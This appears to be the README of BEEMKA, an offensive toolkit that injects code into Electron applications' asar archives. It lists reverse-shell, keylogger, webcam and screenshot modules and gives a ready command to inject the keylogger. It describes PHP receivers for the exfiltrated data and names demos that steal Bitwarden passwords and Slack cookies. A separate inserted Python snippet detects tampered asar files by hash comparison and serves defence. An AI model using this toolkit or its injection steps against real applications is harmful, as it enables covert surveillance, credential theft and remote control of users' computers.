  • Language
    Python
  • License
    MIT License
  • Created almost 6 years ago
  • Updated about 5 years ago


Basic Electron Exploitation

BEEMKA

Electron Exploitation Toolkit

BSidesLV Slack Cookie Egress Demo

BSidesLV VSCode Source Code Egress Demo

Demo Videos (YouTube)

  • Bitwarden Password Egress
  • Skype Reverse Shell (Linux)
  • Slack Desktop Screenshots
  • VS Code WebCamera

Requirements

  • Python 3.5+
  • jsmin

Installation

pip3 install -r requirements.txt

Modules

python3 beemka.py --list

Available modules

[ rshell_cmd ]          Windows Reverse Shell
[ rshell_linux ]        Linux Reverse Shell
[ screenshot ]          Screenshot Module
[ rshell_powershell ]   PowerShell Reverse Shell
[ keylogger ]           Keylogger Module
[ webcamera ]           WebCamera Module

Features:

usage: Beemka Electron Exploitation [-h] [-v] [-l] [-i] [-f ASAR_FILE]
                                    [-p ASAR_WORKING_PATH] [-o OUTPUT_FILE]
                                    [-m MODULE] [-u] [-z]

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -l, --list-modules    List all available modules.
  -i, --inject          Inject code into Electron.
  -f ASAR_FILE, --asar ASAR_FILE
                        Path to electron.asar file.
  -p ASAR_WORKING_PATH, --asar-working-path ASAR_WORKING_PATH
                        Temporary working path to use for extracting asar
                        archives.
  -o OUTPUT_FILE, --output OUTPUT_FILE
                        Path to the file that will be generated.
  -m MODULE, --module MODULE
                        Module to inject. Use --list-modules to list available
                        modules.
  -u, --unpack          Unpack asar file.
  -z, --pack            Pack asar file.

Injecting a module into an application:

python3 beemka.py --inject --module keylogger --asar "PATH_TO_ELECTRON.ASAR" --output "SAVE_AS_ASAR"
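
From the defender's side, an archive written by --inject differs from the vendor's original, so a per-file hash comparison against a known-good copy shows what changed. The sketch below is an added example, not part of BEEMKA; it assumes the standard asar layout (four little-endian uint32 fields followed by a JSON index), and the function names and the constructed sample builder are illustrative.

```python
import hashlib
import json
import struct


def asar_manifest(blob: bytes) -> dict:
    """Return {path: sha256 hex} for every packed file in an asar archive."""
    # Assumed layout: four little-endian uint32 fields, then the JSON header.
    # Field 2 is the header pickle size; file data starts at 8 + that size.
    _, header_size, _, json_len = struct.unpack_from("<4I", blob, 0)
    header = json.loads(blob[16:16 + json_len].decode("utf-8"))
    base, manifest = 8 + header_size, {}

    def walk(node, prefix):
        for name, entry in node.get("files", {}).items():
            path = prefix + name
            if "files" in entry:                     # directory
                walk(entry, path + "/")
            elif "offset" in entry:                  # packed file
                start = base + int(entry["offset"])  # offset is stored as a string
                data = blob[start:start + entry["size"]]
                manifest[path] = hashlib.sha256(data).hexdigest()
            else:                                    # unpacked file or link
                manifest[path] = "not-packed"

    walk(header, "")
    return manifest


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Classify paths as added, removed or modified relative to the baseline."""
    shared = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in shared if baseline[p] != current[p]),
    }


def build_sample_asar(files: dict) -> bytes:
    """Constructed test input: pack {name: bytes} into a flat asar-style blob."""
    index, body = {}, b""
    for name, data in files.items():
        index[name] = {"size": len(data), "offset": str(len(body))}
        body += data
    js = json.dumps({"files": index}).encode()
    padded = js + b"\0" * (-len(js) % 4)
    head = struct.pack("<4I", 4, len(padded) + 8, len(padded) + 4, len(js))
    return head + padded + body
```

For a real check, pass the bytes of the installed archive and of a copy taken from the vendor's installer to asar_manifest and diff the two results.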

Exfiltration helpers

Under the ./server directory there are the following files:

text.php

This file can be used to receive data sent by the keylogger module.

Before using it, make sure you update the "$storage" parameter at the beginning of the file.

image.php

This file can be used to receive data sent by the webcamera and screenshot modules.

Before using it, make sure you update the "$storage" parameter at the beginning of the file.

Credits

Leonardo Vieira for his asar.py class
